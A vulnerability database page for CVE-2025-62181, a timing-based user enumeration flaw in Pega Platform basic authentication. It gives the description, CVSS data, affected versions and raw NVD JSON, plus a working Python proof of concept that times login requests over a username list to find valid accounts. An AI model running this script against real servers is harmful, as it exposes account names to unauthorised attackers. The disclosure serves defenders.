Security Vulnerability Report
中文
CVE-2025-62181 CVSS 5.3 MEDIUM

CVE-2025-62181

Published: 2025-12-10 21:16:04
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Pega Platform versions 7.1.0 through Infinity 25.1.0 are affected by a User Enumeration. This issue occurs during user authentication process, where a difference in response time could allow a remote unauthenticated user to determine if a username is valid or not. This only applies to deprecated basic-authentication feature and other more secure authentication mechanisms are recommended. A fix is being provided in the 24.1.4, 24.2.4, and 25.1.1 patch releases. Please note: Basic credentials authentication service type is deprecated started in 24.2 version: https://docs.pega.com/bundle/platform/page/platform/release-notes/security/whats-new-security-242.html.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Pega Platform 7.1.0
Pega Platform 7.2.x
Pega Platform 7.3.x
Pega Platform 7.4.x
Pega Platform 8.x
Pega Platform 21.x
Pega Platform 22.x
Pega Platform 23.x
Pega Platform 24.1.x (< 24.1.4)
Pega Platform 24.2.x (< 24.2.4)
Pega Platform 25.1.x (< 25.1.1)
Pega Platform 25.1.0 (Infinity)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62181 User Enumeration PoC # Target: Pega Platform (versions 7.1.0 - 25.1.0) # Vulnerability: User enumeration via timing attack on authentication import requests import time import statistics TARGET_URL = "https://target-pega-server.com/prweb/api/authentication" USERNAME_FILE = "usernames.txt" NUM_REQUESTS = 10 # Number of requests per username for timing analysis def test_username_timing(username): """Test response time for a given username""" times = [] for _ in range(NUM_REQUESTS): start = time.time() # Basic auth request (deprecated feature) response = requests.get( TARGET_URL, auth=(username, "fake_password_for_timing"), timeout=30 ) elapsed = time.time() - start times.append(elapsed) avg_time = statistics.mean(times) std_dev = statistics.stdev(times) if len(times) > 1 else 0 return avg_time, std_dev def main(): print(f"[*] CVE-2025-62181 User Enumeration PoC") print(f"[*] Target: {TARGET_URL}") with open(USERNAME_FILE, 'r') as f: usernames = [line.strip() for line in f] # Establish baseline timing print("[*] Establishing baseline timing...") baseline_times = [] for _ in range(NUM_REQUESTS): start = time.time() requests.get(TARGET_URL, auth=("nonexistent_user_12345", "x"), timeout=30) baseline_times.append(time.time() - start) baseline = statistics.mean(baseline_times) print(f"[*] Baseline response time: {baseline:.4f}s") print("[*] Starting user enumeration...") valid_users = [] for username in usernames: avg_time, std_dev = test_username_timing(username) # If response time significantly differs from baseline, user might be valid time_diff = avg_time - baseline if abs(time_diff) > 0.1: # Threshold for timing difference print(f"[+] Potential valid user: {username} (avg: {avg_time:.4f}s, diff: {time_diff:+.4f}s)") valid_users.append(username) else: print(f"[-] {username} (avg: {avg_time:.4f}s)") print(f"\n[*] Found {len(valid_users)} potential valid users:") for user in valid_users: print(f" - {user}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62181", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:04.303", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pega Platform versions 7.1.0 through Infinity 25.1.0 are affected by a User Enumeration. This issue occurs during user authentication process, where a difference in response time could allow a remote unauthenticated user to determine if a username is valid or not. This only applies to deprecated basic-authentication feature and other more secure authentication mechanisms are recommended. A fix is being provided in the 24.1.4, 24.2.4, and 25.1.1 patch releases. Please note: Basic credentials authentication service type is deprecated started in 24.2 version: https://docs.pega.com/bundle/platform/page/platform/release-notes/security/whats-new-security-242.html."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "references": [{"url": "https://support.pega.com/support-doc/pega-security-advisory-j25-vulnerability-remediation-note", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.